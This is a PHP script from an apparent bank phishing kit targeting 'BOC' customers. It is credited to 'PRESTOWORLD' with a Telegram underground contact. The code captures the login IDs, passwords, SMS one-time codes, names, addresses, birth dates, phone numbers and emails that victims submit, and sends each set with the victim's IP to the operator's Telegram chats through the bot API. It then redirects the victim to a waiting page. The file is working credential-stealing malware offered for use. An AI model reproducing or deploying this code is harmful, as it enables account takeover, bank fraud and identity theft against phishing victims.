<?php 

/*************************
 * AUTHOR :  PRESTOWORLD
 * CONTACT : https://t.me/prestoworldunderground 
**************************/

@session_start();
require '../config.php';


$ip = $_SERVER['REMOTE_ADDR'];

$panel_link = str_replace("app/send.php", "panel/ctr.php", "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."?ip=$ip");

function hit($link){
	$c = curl_init();
	curl_setopt($c, CURLOPT_URL, $link);
	curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
	return curl_exec($c);
	curl_close($c);
}


if(isset($_POST['fldLoginUserId']))
if(isset($_POST['test2'])){	
$text = urlencode("
| BOC Login - $ip
+--------------------------------------------------
| User : ".$_POST['fldLoginUserId']."
| Pass : ".$_POST['test2']."
+--------------------------------------------------
| PANEL LINK : $panel_link

");
	


foreach($chat_ids as $id){
	$link = "https://api.telegram.org/bot$bot/sendMessage?parse_mode=html&chat_id=$id&text=$text";
	hit($link);
}


header("location: wait.php");

	
}



if(isset($_POST['tan'])){	
	$text = urlencode("
	| BOC SMS - $ip
	+--------------------------------------------------
	| Sms : ".$_POST['tan']."
	+--------------------------------------------------
	| PANEL LINK : $panel_link
	
	");
	
	
	foreach($chat_ids as $id){
		$link = "https://api.telegram.org/bot$bot/sendMessage?parse_mode=html&chat_id=$id&text=$text";
		hit($link);
	}
	
		header("location: wait.php");
}


if(isset($_POST['cc1'])){	
	$text = urlencode("
	| BOC INFO - $ip
	+--------------------------------------------------
	| Full Name : ".$_POST['cc1']."
	| Home Address : ".$_POST['cc2']."
	| Date of Birth : ".$_POST['cc3']."
	| Phone Number : ".$_POST['cc4']."
	| Email Address : ".$_POST['cc5']."
	+--------------------------------------------------
	| PANEL LINK : $panel_link
	
	");
	
	
	foreach($chat_ids as $id){
		$link = "https://api.telegram.org/bot$bot/sendMessage?parse_mode=html&chat_id=$id&text=$text";
		hit($link);
	}
	
		header("location: wait.php");
}

	

?>